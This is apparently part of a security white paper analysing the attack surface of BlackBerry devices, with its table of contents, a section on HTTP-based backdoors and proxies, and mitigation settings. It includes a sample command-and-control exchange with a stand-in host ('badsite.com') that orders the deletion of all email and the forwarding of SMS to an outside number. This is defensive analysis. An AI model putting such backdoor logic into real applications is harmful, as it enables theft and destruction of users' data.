Specifications
Table Of Contents
- Introduction........................................................................................................................................................
- Architecture Overview........................................................................................................................................
- Operating System..............................................................................................................................
- Code Signing...................................................................................................................................................
- Modifying Signed Applications..................................................................................................................
- Malicious Code Signing..............................................................................................................................
- Mitigation Strategies......................................................................................................................................
- BIS Deployment.........................................................................................................................................
- Application Permissions.......................................................................................................................
- Device Firewall....................................................................................................................................
- BES Deployment......................................................................................................................................
- IT Policy...............................................................................................................................................
- Application Control Policy...................................................................................................................
- Application Permissions.....................................................................................................................
- Device Firewall....................................................................................................................................
- Attack Surface Analysis....................................................................................................................................
- Introduction.................................................................................................................................................
- JAD Files.......................................................................................................................................................
- Mitigation................................................................................................................................................
- File System...................................................................................................................................................
- Persistent Storage...................................................................................................................................
- J2ME File System.....................................................................................................................................
- USB Mass Storage....................................................................................................................................
- Mitigation................................................................................................................................................
- Memory and Processes................................................................................................................................
- Auto start-up and Background processes...............................................................................................
- SMS (Short Message Service)......................................................................................................................
- Premium Rate Scam................................................................................................................................
- SMS Interception.....................................................................................................................................
- SMS Backdoor..........................................................................................................................................
- Mitigation................................................................................................................................................
- Bluetooth......................................................................................................................................................
- Bluetooth Backdoor.................................................................................................................................
- Bluetooth Worms.....................................................................................................................................
- Mitigation................................................................................................................................................
- Email.............................................................................................................................................................
- Email Interception...................................................................................................................................
- Backdoor..................................................................................................................................................
- Worm........................................................................................................................................................
- Mitigation................................................................................................................................................
- PIM Data (Personal Information Manager Data).........................................................................................
- Data Theft................................................................................................................................................
- Loss of data availability and integrity.....................................................................................................
- Mitigation................................................................................................................................................
- TCP/IP Connections......................................................................................................................................
- Proxy/Firewall Bypass.............................................................................................................................
- Backdoor..................................................................................................................................................
- Port Scan..................................................................................................................................................
- Mitigation................................................................................................................................................
- Port Scan..................................................................................................................................................
- HTTP / WAP...................................................................................................................................................
- Data Theft................................................................................................................................................
- Backdoor............................................................................................................................................
- HTTP Proxy...............................................................................................................................................
- Mitigation................................................................................................................................................
- Telephony.....................................................................................................................................................
- Call Record Monitoring............................................................................................................................
- Premium Rate Calls.................................................................................................................................
- Bypassing Caller Verification Systems....................................................................................................
- Telephony Data Theft...............................................................................................................................
- Mitigation................................................................................................................................................
- Camera.........................................................................................................................................................
- Mitigation................................................................................................................................................
- Conclusions......................................................................................................................................................
- Appendix A........................................................................................................................................................
- References........................................................................................................................................................
Attack Surface Analysis of BlackBerry Devices
Application sends:
http://www.badsite.com/whatnow?
Web site returns:
COMMAND=DELETE_ALL EMAIL
COMMAND=FORWARD_ALL SMS TO 0865550456
Application sends:
http://www.badsite.com/whatnow?Status=Email+Deleted&Status=SMS+Forwarding+ON
HTTP Proxy
A malicious application could use the BlackBerry device to proxy HTTP traffic or contact Web servers with
predefined content. Typically, a HTTP Proxy may be used to browse restricted, illegal or dubious Web sites,
or be utilized for denial of service attacks.
A proof-of-concept implementation used a HTTP
StreamConnection object to connect to a remote Web site,
and then marshalled the returned data to a third party (who had a listener socket running on a specified
port) via a TCP socket StreamConnection object. Note that your network provider must support full internet
access from the BlackBerry in order for this to be functional.
Such attacks will be traced back to the individual or corporation that owns the BlackBerry rather than the
actual attacker.
Mitigation
You can set the following options to mitigate the attacks outlined above. See Mitigation Strategies for more
information.
Data Theft
29
IT Policy "Allow External Connections" = False
Application Controls "External Domains" = [list of allowed domains]
or
"External Network Connections" = Not Permitted
Device Firewall Status = Enabled
Application Permissions Connections > Carrier Internet = Deny
Other Device Settings